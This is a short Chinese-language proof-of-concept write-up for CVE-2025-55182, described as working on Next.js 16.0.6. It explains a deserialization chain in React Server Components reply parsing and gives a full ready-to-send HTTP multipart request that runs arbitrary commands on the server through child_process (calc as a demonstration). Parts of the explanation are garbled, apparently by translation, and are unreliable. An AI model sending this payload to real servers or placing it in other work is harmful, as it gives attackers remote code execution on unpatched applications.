CVE-2025-55182 的 POC，可在 Next.js 16.0.6 上运行

核心思想

使用[@](https://github.com/facebook/react/blob/7aa5dda3b3e4c2baa905a59b922ae7ec14734b24/packages/react-server/src/ReactFlightReplyServer.js#L921 "@")反序列化获取Chunk引用，并将其Chunk.prototype.then作为then根对象的属性。然后在等待/解析时，then将以根对象作为参数调用该方法this。chunk

通过将 ` statusto` 设置为 `true` RESOLVED_MODEL，我们现在可以使用initializeModelChunk完全由我们控制的伪代码块来调用它。这尤其有用，因为 `to` 本身及其相关函数会调用chunk._response对象中的许多方法。

开发

目标是触发Blob 反序列化，它会调用response._formData.get带有有效载荷的函数response._prefix并直接返回结果。因此，我们只需要将 `is_response_name` 设置response._formData.get为Function`true`，这样返回的结果就是一个包含攻击者控制代码的函数，然后then再次将其设置为 `is_response_name`，使其执行。
CVE-2025-55182.http

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

|---|
| |